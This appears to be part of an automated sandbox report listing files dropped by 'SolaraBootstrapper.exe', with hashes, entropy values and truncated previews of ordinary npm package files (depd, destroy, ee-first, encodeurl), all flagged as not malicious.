                                                  Preview:# depd..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Linux Build][travis-image]][travis-url].[![Windows Build][appveyor-image]][appveyor-url].[![Coverage Status][coveralls-image]][coveralls-url]..Deprecate all the things..> With great modules comes great responsibility; mark things deprecated!..## Install..This module is installed directly using `npm`:..```sh.$ npm install depd.```..This module can also be bundled with systems like.[Browserify](http://browserify.org/) or [webpack](https://webpack.github.io/),.though by default this module will alter it's API to no longer display or.track deprecations...## API.. eslint-disable no-unused-vars -->..```js.var deprecate = require('depd')('my-module').```..This library allows you to display deprecation messages to your users..This library goes above and beyond with deprecation warnings by.introspection of the call stack (but only the bits that
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):10932
                                                  Entropy (8bit):4.779926082102364
                                                  Encrypted:false
                                                  SSDEEP:192:vpe1221Fdc5jXmXUApvcvcBGtXY/KQYbUY/rRgrNoYo8GVHXWVhVO:vpe191Lc5G0k//YsNIVHXWVhVO
                                                  MD5:002A1F3E813CC05D9E3CC011F6601628
                                                  SHA1:1690C27457637EC234D6B7658F1B96E547A0EB99
                                                  SHA-256:4D587A5662E20A7BB9BFE6555AFE5987E1B80303A819B447394F37A93297EE91
                                                  SHA-512:EA1AD9BCF09A73A10DD1FD8A66DAAC12F87725E16AD27E7BEFF6D9FDA937579976CD5D7ED6439C4122B16178C3FFDF410D6C7A54918F94BC98FA7950ADF3BD54
                                                  Malicious:false
                                                  Preview:/*!. * depd. * Copyright(c) 2014-2018 Douglas Christopher Wilson. * MIT Licensed. */../**. * Module dependencies.. */..var relative = require('path').relative../**. * Module exports.. */..module.exports = depd../**. * Get the path to base files on.. */..var basePath = process.cwd()../**. * Determine if namespace is contained in the string.. */..function containsNamespace (str, namespace) {. var vals = str.split(/[ ,]+/). var ns = String(namespace).toLowerCase().. for (var i = 0; i < vals.length; i++) {. var val = vals[i].. // namespace contained. if (val && (val === '*' || val.toLowerCase() === ns)) {. return true. }. }.. return false.}../**. * Convert a data descriptor to accessor descriptor.. */..function convertDataDescriptorToAccessor (obj, prop, message) {. var descriptor = Object.getOwnPropertyDescriptor(obj, prop). var value = descriptor.value.. descriptor.get = function getter () { return value }.. if (descriptor.writable) {. descriptor.set = functi
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1512
                                                  Entropy (8bit):4.711096243724832
                                                  Encrypted:false
                                                  SSDEEP:24:6+kpAtB8dDl1AQGkeAfaTOM2WKmbzTPJoFCWZ4aMY4rZCsCWZ4aM8J/cZyC5HnrC:/kG2dD3HaThlKaJodZDMY4rZCQZDM8J7
                                                  MD5:5B958F39DF1DF069739CCD3765BAD0DE
                                                  SHA1:C010F754ECD1E959F6BACAC10E976BEE24C215A0
                                                  SHA-256:10B4D4A4E9D14E9E6A5AB7CED64405EF90E6BEC94D479A8E223CBBA88828AD79
                                                  SHA-512:5848B28DDAAC1AF95D658D110AE8C18D309044206B066C575705E0F8B75F4A918FE692E5F90BBA6FE2B1C4EF8344C7096C4F7E2CE87F7FB1537B55E0489D75B3
                                                  Malicious:false
                                                  Preview:/*!. * depd. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = depd../**. * Create deprecate for namespace in caller.. */..function depd (namespace) {. if (!namespace) {. throw new TypeError('argument namespace is required'). }.. function deprecate (message) {. // no-op in browser. }.. deprecate._file = undefined. deprecate._ignored = true. deprecate._namespace = namespace. deprecate._traced = false. deprecate._warned = Object.create(null).. deprecate.function = wrapfunction. deprecate.property = wrapproperty.. return deprecate.}../**. * Return a wrapped function in a deprecation message.. *. * This is a no-op version of the wrapper, which does nothing but call. * validation.. */..function wrapfunction (fn, message) {. if (typeof fn !== 'function') {. throw new TypeError('argument fn must be a function'). }.. return fn.}../**. * Wrap property in a deprecation message.. *. * T
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1335
                                                  Entropy (8bit):4.797072283263959
                                                  Encrypted:false
                                                  SSDEEP:24:SI411vNmW65tug6YvnZ/dWzrNtn6T+l6oOUr5g/xlr4QagRxf:SIIEt5tug6YvnVczrX0+woOUr5mNaS
                                                  MD5:7F0A9D228C79F0EE4B89FC6117F1C687
                                                  SHA1:3C10082C1464A6F589AA10CDA88285E780EBF857
                                                  SHA-256:5A3659BCC2E47B25EBF9F23F38EB9452A58920BFE4B59410BFA6FE84639A3B99
                                                  SHA-512:7BDD7259BCB8D79AA41777F03D3A3F8A29B60C2D25104072EDBA9FEBEB813E12EF78D31573637702DECDDBAA97D8FEC263BC413BD27DD660DED17D644458CBC2
                                                  Malicious:false
                                                  Preview:{. "name": "depd",. "description": "Deprecate all the things",. "version": "2.0.0",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "keywords": [. "deprecate",. "deprecated". ],. "repository": "dougwilson/nodejs-depd",. "browser": "lib/browser/index.js",. "devDependencies": {. "benchmark": "2.1.4",. "beautify-benchmark": "0.2.4",. "eslint": "5.7.0",. "eslint-config-standard": "12.0.0",. "eslint-plugin-import": "2.14.0",. "eslint-plugin-markdown": "1.0.0-beta.7",. "eslint-plugin-node": "7.0.1",. "eslint-plugin-promise": "4.0.1",. "eslint-plugin-standard": "4.0.0",. "istanbul": "0.4.5",. "mocha": "5.2.0",. "safe-buffer": "5.1.2",. "uid-safe": "2.1.5". },. "files": [. "lib/",. "History.md",. "LICENSE",. "index.js",. "Readme.md". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint --plugin markdown --ext js,md .",.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1173
                                                  Entropy (8bit):5.171834503291163
                                                  Encrypted:false
                                                  SSDEEP:24:8FMpJrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:8FMpJaJHlxE35QHOs5exm3ogF5n
                                                  MD5:D5EB22CF6CC99E645B98B28EE3503DDF
                                                  SHA1:E87DACBBEBE82F47B02F82971414682C03560373
                                                  SHA-256:FFE370C8785B0B688D954977CE8DC52E19E5F17962CC5F80009C85EBA4925D56
                                                  SHA-512:EBC01C095571F7C89F87D4164E82B0EC7E441113EEAB25D6FC242B928E96497C7E5DD5034ED12C776B660B957526DA5F9675AD32DE3E432861215CB8B37649CE
                                                  Malicious:false
                                                  Preview:.The MIT License (MIT)..Copyright (c) 2014 Jonathan Ong me@jongleberry.com.Copyright (c) 2015-2022 Douglas Christopher Wilson doug@somethingdoug.com..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2459
                                                  Entropy (8bit):4.899069861606129
                                                  Encrypted:false
                                                  SSDEEP:48:f4pIvIaRrqH/8ziv/1o+rGRJG7XGIfwgk57mLAsXPZImIEeJN:fPQx/H1oB2fwgkh+X+/5
                                                  MD5:5866F60785543AB8D86B79DEC253DB49
                                                  SHA1:31D6D0F4B8F17C2551540857056950C406618F51
                                                  SHA-256:80F720DB998D4728565126EA1D4B96C5248D35C2E53032D23692CE3930DE69C8
                                                  SHA-512:BF638F2F6112C8231C08A26784B0F86079494B4DFBB14D59BA87B0A72075FF1364FCC796463E6055D120E6FAEC30A47DE4F351FB769F1548D5C213ECB45B28ED
                                                  Malicious:false
                                                  Preview:# destroy..[![NPM version][npm-image]][npm-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test coverage][coveralls-image]][coveralls-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..Destroy a stream...This module is meant to ensure a stream gets destroyed, handling different APIs.and Node.js bugs...## API..```js.var destroy = require('destroy').```..### destroy(stream [, suppress])..Destroy the given stream, and optionally suppress any future `error` events...In most cases, this is identical to a simple `stream.destroy()` call. The rules.are as follows for a given stream:.. 1. If the `stream` is an instance of `ReadStream`, then call `stream.destroy()`. and add a listener to the `open` event to call `stream.close()` if it is. fired. This is for a Node.js bug that will leak a file descriptor if. `.destroy()` is called before `open`.. 2. If the `stream` is an instance of a zlib stream, then call `stream
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4258
                                                  Entropy (8bit):4.806124915382072
                                                  Encrypted:false
                                                  SSDEEP:96:QDxP4dH18X0MJ1ncBEPwxr+Pfdm6h0eFoFXJ:QDxPEVXM3ncBEPwocuFoF5
                                                  MD5:35723299A9B5B96D111CBF94C56C898F
                                                  SHA1:6547E9C6DBFB287CB22819955726EFC01A29950F
                                                  SHA-256:B54F50DB059987726CE2BDADCA5D66A1E3CEEF183AA5F43CE61AA53F05C36CB7
                                                  SHA-512:D68622A50B1EFA8C3BA52FBF8F1A036CFFAFE608DC0788013F9B7347C7077F3167CB2504D54815750225DAD601C376A485357906F3C0CB6493BBAC67D4AC9579
                                                  Malicious:false
                                                  Preview:/*!. * destroy. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2015-2022 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var EventEmitter = require('events').EventEmitter.var ReadStream = require('fs').ReadStream.var Stream = require('stream').var Zlib = require('zlib')../**. * Module exports.. * @public. */..module.exports = destroy../**. * Destroy the given stream, and optionally suppress any future `error` events.. *. * @param {object} stream. * @param {boolean} suppress. * @public. */..function destroy (stream, suppress) {. if (isFsReadStream(stream)) {. destroyReadStream(stream). } else if (isZlibStream(stream)) {. destroyZlibStream(stream). } else if (hasDestroy(stream)) {. stream.destroy(). }.. if (isEventEmitter(stream) && suppress) {. stream.removeAllListeners('error'). stream.addListener('error', noop). }.. return stream.}../**. * Destroy a ReadStream.. *. * @param {object} stream. * @private.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1128
                                                  Entropy (8bit):4.69558664454679
                                                  Encrypted:false
                                                  SSDEEP:24:p3Ho11KGS+7UEGGQxVbYuNCHIZBlW90qLv/ZK:p3H4KGT7Vd+VbYuNCHIzUOqr/Q
                                                  MD5:6015F23C6E2FD79F4A6E29453CE4DC1D
                                                  SHA1:E12115ED9A1E2C56EB35ECFC14FF83B8C02935D5
                                                  SHA-256:F865B50652DC062F43142E01F55DB2760CC10D255BD05AFD232E738999C58188
                                                  SHA-512:1A09253A53E4067ABB67E51D3EFC6483DA2984581BB1583805DA63A602B525E9B5055B78EEDD42E823BDA8FCBCD92A69B1D89F72DE5E3D867524476C05552EA2
                                                  Malicious:false
                                                  Preview:{. "name": "destroy",. "description": "destroy a stream if possible",. "version": "1.2.0",. "author": {. "name": "Jonathan Ong",. "email": "me@jongleberry.com",. "url": "http://jongleberry.com",. "twitter": "https://twitter.com/jongleberry". },. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "repository": "stream-utils/destroy",. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.2",. "nyc": "15.1.0". },. "engines": {. "node": ">= 0.8",. "npm": "1.2.8000 || >= 1.4.16". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec",. "test-ci": "nyc --reporter=lcovonly --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text npm test". },. "files": [. "inde
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1099
                                                  Entropy (8bit):5.12118596206391
                                                  Encrypted:false
                                                  SSDEEP:24:8FMp0rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:8FMp0aJHlxE35QHOs5exm3ogF5n
                                                  MD5:C8D3A30332ECB31CFAF4C0A06DA18F5C
                                                  SHA1:B559C45C8D07F2679620D9771E68696EE3D5964B
                                                  SHA-256:965EF284F7F4C176842EC2E87FA13E79FEED777D56D7A21A5A3B38F1BB6DC288
                                                  SHA-512:50C1DA708C8FD2675EAA7DD1C1D74D42624CFAD467909DFA6AD8827DE73389716875EADA418B4DA056296728B28DC0959CF76392284DCCED468857D1F2186A99
                                                  Malicious:false
                                                  Preview:.The MIT License (MIT)..Copyright (c) 2014 Jonathan Ong me@jongleberry.com..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2617
                                                  Entropy (8bit):4.881718825469232
                                                  Encrypted:false
                                                  SSDEEP:48:WERrqLuF98WhXW4RR6TjgGpgFAeTZ3BwbTZOkt47mZALXq:eLuFOWZW4dy3eTZ3+bTZOktKTXq
                                                  MD5:8591E9D47FB8574F4A99AC3DE242B3CC
                                                  SHA1:7C611CDEB6B66DF78ADFB4B1A56FEC087DCE14B5
                                                  SHA-256:4480E03D020436E665886A99120ABB2EE7FB422850E1B53CCBDBDBD251414C23
                                                  SHA-512:3309F93386F1A8275F8EF1D76B2E242C8287C39662BE567A501DEE017B5564C0F1E73BA332816FD6387DA5497918A5B2824DC0DA94A6B1ECD7A87C85F1FB2AEF
                                                  Malicious:false
                                                  Preview:# EE First..[![NPM version][npm-image]][npm-url].[![Build status][travis-image]][travis-url].[![Test coverage][coveralls-image]][coveralls-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url].[![Gittip][gittip-image]][gittip-url]..Get the first event in a set of event emitters and event pairs,.then clean up after itself...## Install..```sh.$ npm install ee-first.```..## API..```js.var first = require('ee-first').```..### first(arr, listener)..Invoke `listener` on the first event from the list specified in `arr`. `arr` is.an array of arrays, with each array in the format `[ee, ...event]`. `listener`.will be called only once, the first time any of the given events are emitted. If.`error` is one of the listened events, then if that fires first, the `listener`.will be given the `err` argument...The `listener` is invoked as `listener(err, ee, event, args)`, where `err` is the.first argument emitted from an `error` event, if applicable; `ee` is the eve
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1684
                                                  Entropy (8bit):4.5679331887887225
                                                  Encrypted:false
                                                  SSDEEP:24:U+XMpAtBfp0LsQS1JCyOyTZqDZJQSQoIH0h0EzNxTQw516j4bv9ALogX23v+h:lXMGFp0LshIDU6FkA8jwGoWaO
                                                  MD5:E7A3F46D4B903C9F8A025CB753B1A538
                                                  SHA1:6721B521AC3509731D3D0F9B0074908176E1FCC4
                                                  SHA-256:29D3CCCDDC7148F48715BFC94EB6F7B9F9132A5ECB704B9D4B713DE87E7603DD
                                                  SHA-512:8E679EA25F82928ED7D55A6E2C08A647C6457D84749155716273BA3B33A030C262DD359A3BBB12465A58E3DC89BCEC9C3FB7E9CE64B3ECFBF2B14DF49B9DAFEA
                                                  Malicious:false
                                                  Preview:/*!. * ee-first. * Copyright(c) 2014 Jonathan Ong. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = first../**. * Get the first event in a set of event emitters and event pairs.. *. * @param {array} stuff. * @param {function} done. * @public. */..function first(stuff, done) {. if (!Array.isArray(stuff)). throw new TypeError('arg must be an array of [ee, events...] arrays').. var cleanups = [].. for (var i = 0; i < stuff.length; i++) {. var arr = stuff[i].. if (!Array.isArray(arr) || arr.length < 2). throw new TypeError('each array member must be [ee, events...]').. var ee = arr[0].. for (var j = 1; j < arr.length; j++) {. var event = arr[j]. var fn = listener(event, callback).. // listen to the event. ee.on(event, fn). // push this listener to the list of cleanups. cleanups.push({. ee: ee,. event: event,. fn: fn,. }). }. }.. function callback() {. cleanup().
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):859
                                                  Entropy (8bit):4.742869091916768
                                                  Encrypted:false
                                                  SSDEEP:12:OXjj1wGSMwMVZrAEG1jnGQxR7CnpZ+U0wWpk/Ga4JVSYLZLPOyZiPjXy8enYMw:gX1wGS+7UEGGQxVekFwW7Zqy4y8e1w
                                                  MD5:3ED21090E07EF5DD57729A77C4291CB9
                                                  SHA1:7FFE61F87F94A558FABC177CAD5C9B90B16481CF
                                                  SHA-256:A4EECE6FF6B38BF7AC107323F381CC60500097A9CBDD473F5D5B45E68822CB89
                                                  SHA-512:54DE61C6AB428104F9A559ECD3DF7868AB7F1B5C8B85A3F658C8DAB13D435BD0766C6B48178A1D5BD083B0829F6461158E303538C7D08761B201B17F7C9940B3
                                                  Malicious:false
                                                  Preview:{. "name": "ee-first",. "description": "return the first event in a set of ee/event pairs",. "version": "1.1.1",. "author": {. "name": "Jonathan Ong",. "email": "me@jongleberry.com",. "url": "http://jongleberry.com",. "twitter": "https://twitter.com/jongleberry". },. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "repository": "jonathanong/ee-first",. "devDependencies": {. "istanbul": "0.3.9",. "mocha": "2.2.5". },. "files": [. "index.js",. "LICENSE". ],. "scripts": {. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/",. "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter spec --check-leaks test/". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):238
                                                  Entropy (8bit):4.290780944952664
                                                  Encrypted:false
                                                  SSDEEP:3:SVmrY1xFYJKgC/gplFvhVcKlFYJKgCqLVlXAzXXKAxFW+ZKoRcLsMVoi6EFhF4:Sf1YFQ01KLI3Wsl67Voil2
                                                  MD5:6AF548DFA20004D203A20CA28F0DED82
                                                  SHA1:529C725BD6F57D3A83154DB7C81A8ED68E53E08F
                                                  SHA-256:862EB81868522938D0C3B042AC31FAA983BCB64509EA05504640053E4F70C759
                                                  SHA-512:1422A896134205F73FD50C3F10CE5CCB0AD98D294CDB8A6F8944D2770B6CDF5DFBAABA072529F9BAD56FD0202D130F0592E7FD5AF074DC0B3D1059173AA1CFA7
                                                  Malicious:false
                                                  Preview:1.0.2 / 2018-01-21.==================.. * Fix encoding `%` as last character..1.0.1 / 2016-06-09.==================.. * Fix encoding unpaired surrogates at start/end of string..1.0.0 / 2016-06-08.==================.. * Initial release.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1089
                                                  Entropy (8bit):5.104507231535383
                                                  Encrypted:false
                                                  SSDEEP:24:/iJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:/iJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:272621EFA0FF4F18A73221E49AB60654
                                                  SHA1:65D4C206A2666653C2FD6E516468FA5AA321E8F1
                                                  SHA-256:7585EA7BBA616CCBBE43CB54ECB67956688C3C5641BB84F3099A652A73193AFE
                                                  SHA-512:745A296359A63383CA54211BE411E0D6F61913B1849B324C69961B3EBEC40C4E2CAE166C5E35FE14AE92D12B56C5472B22229211F88AFAD887410A6389C6E1C8
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2016 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING FROM,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3855
                                                  Entropy (8bit):5.086720488016747
                                                  Encrypted:false
                                                  SSDEEP:48:DvqXC9RR6NdXMoNjYNRZfj5BtqGV79Yoc+92ovA1xR9kimJIUGu5aKi9RT7kZe13:DiXCy15ktzepUn3iKfin7kkEVf+j
                                                  MD5:927F12B955E3ABFE907852D1AB957002
                                                  SHA1:F7FF11DE5504CA62A1D60994EA588F0242B59946
                                                  SHA-256:C034DB4C4433AC44BBC3BA626D1D2D1B02A6B6B76E0A8C92B6760DAE39C5C59A
                                                  SHA-512:036509265D14A13D271328373D996DCB9DDAEC7C6E8437DC70E282CC8F50008C2E4ADDEDB6EB6447171CB238513504F732D960ACA3ED973B93F7CB80A29E4AB1
                                                  Malicious:false
                                                  Preview:# encodeurl..[![NPM Version][npm-image]][npm-url].[![NPM Downloads][downloads-image]][downloads-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Encode a URL to a percent-encoded form, excluding already-encoded sequences..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install encodeurl.```..## API..```js.var encodeUrl = require('encodeurl').```..### encodeUrl(url)..Encode a URL to a percent-encoded form, excluding already-encoded sequences...This function will take an already-encoded URL and encode all the non-URL.code points (as UTF-8 byte sequences). This function will not encode the."%" character unless it is not part of a valid sequence (`%20` will be.l
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1586
                                                  Entropy (8bit):5.418053581573525
                                                  Encrypted:false
                                                  SSDEEP:48:xRG0vcaGF5R6yFv0hD1KRj5BFW+pkpV7zYocKGJ/hK4xv:u4GT0nKRzFW+p5p1hKuv
                                                  MD5:B90CF71779F72E14BE703A4E494E968C
                                                  SHA1:842F42D9EE581D91AC82A7FA018F61BB3F8EF63A
                                                  SHA-256:1D0A4E941C1504DCD9BC6CFBB77F7B44D93E56A29CBA6F2CCEBD78D501A51C16
                                                  SHA-512:8DB5D9A938F397C11C75C77C0CBE6EB609C5D4F81A590F221163FE3291CD0CB2A6286BA8935C8F8CFDABECEC9F7E49A5BFA836DC777E936271FBE0DAEA7414E6
                                                  Malicious:false
                                                  Preview:/*!. * encodeurl. * Copyright(c) 2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = encodeUrl../**. * RegExp to match non-URL code points, *after* encoding (i.e. not including "%"). * and including invalid escape sequences.. * @private. */..var ENCODE_CHARS_REGEXP = /(?:[^\x21\x25\x26-\x3B\x3D\x3F-\x5B\x5D\x5F\x61-\x7A\x7E]|%(?:[^0-9A-Fa-f]|[0-9A-Fa-f][^0-9A-Fa-f]|$))+/g../**. * RegExp to match unmatched surrogate pair.. * @private. */..var UNMATCHED_SURROGATE_PAIR_REGEXP = /(^|[^\uD800-\uDBFF])[\uDC00-\uDFFF]|[\uD800-\uDBFF]([^\uDC00-\uDFFF]|$)/g../**. * String to replace unmatched surrogate pair with.. * @private. */..var UNMATCHED_SURROGATE_PAIR_REPLACE = '$1\uFFFD$2'../**. * Encode a URL to a percent-encoded form, excluding already-encoded sequences.. *. * This function will take an already-encoded URL and encode all the non-URL. * code points. This function will not encode the "%" character unless it is. * not
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1091
                                                  Entropy (8bit):4.801734666240135
                                                  Encrypted:false
                                                  SSDEEP:24:SJOGaVm51ExVTXNAcIMYfP8IWZHnWPxcnjZqy4y8e1w:EIMaVTXq0YfP8XtWPx8jogw
                                                  MD5:453A9BB10C91E0EC44F305B14E30CE82
                                                  SHA1:73C01B81F34A9978B158DF2744EF8C45251D6193
                                                  SHA-256:30B1A43843675F42033FD6C77C19B20AD4344844F0BD5526C586081E93A48FE8
                                                  SHA-512:D81EE5F2394493A5F93918ECAE6581F82EE529FBBD257E0DC10EA68F09C39D0D19E3A6B0E9560EB1250D88A9B1F591D6469F28404410B16B580CBE179E37DA0F
                                                  Malicious:false
                                                  Preview:{. "name": "encodeurl",. "description": "Encode a URL to a percent-encoded form, excluding already-encoded sequences",. "version": "1.0.2",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>". ],. "license": "MIT",. "keywords": [. "encode",. "encodeurl",. "url". ],. "repository": "pillarjs/encodeurl",. "devDependencies": {. "eslint": "3.19.0",. "eslint-config-standard": "10.2.1",. "eslint-plugin-import": "2.8.0",. "eslint-plugin-node": "5.2.1",. "eslint-plugin-promise": "3.6.0",. "eslint-plugin-standard": "3.0.1",. "istanbul": "0.4.5",. "mocha": "2.5.3". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot --check-leaks test/",. "test-travis": "istanbul cover nod
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):144
                                                  Entropy (8bit):4.538202190525913
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHLAC8/EgHMDlvwR/6G+sNqR6LesNEvssTsvv:ExL0UxNSH383sDlJbupsg3
                                                  MD5:09A7141E4D4FEA956FB26245D7CFFFE6
                                                  SHA1:0C3C91D3282B7A6F78F17E6CBB1BC670439E456B
                                                  SHA-256:317B53D336FEF735ECF930B9518869A5692C1BD1B80EA2D53CE6A86B36919C67
                                                  SHA-512:1897D9D40451F3FECD12D9B55752D0A74BF23656C8AB03712C083E6C4B273BF158C1D1F328294E5DA01BEA0BF016BB5346EE975AC843595392C02C5BD1F220B8
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."new-cap": ["error", {...."capIsNewExceptions": [....."GetIntrinsic",....],...}],..},.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):564
                                                  Entropy (8bit):4.605290209060228
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMrzlgM01bZBgMoGbQjgMy9gMLzgMT:qoQWAg0g+H0mgClg7g1GegJ9gEzgs
                                                  MD5:FED312B9B7FC8F3B324DC593AD0C9A83
                                                  SHA1:C34A570A604C84D4E042442F8518FEB47FD6C027
                                                  SHA-256:FDD23EB2A51D498F6BBC1D709EB6FAD3778BBB0205126BC9548D4C59B714A402
                                                  SHA-512:A667549517456DCE6E2A7220EAF75704173DD6A80CCEBAD2D4DACCF973744E8E451B08129B10BC2F900B8AE5F875EFD0EC1BD23217DC21B534EEDC082F70DB27
                                                  Malicious:false
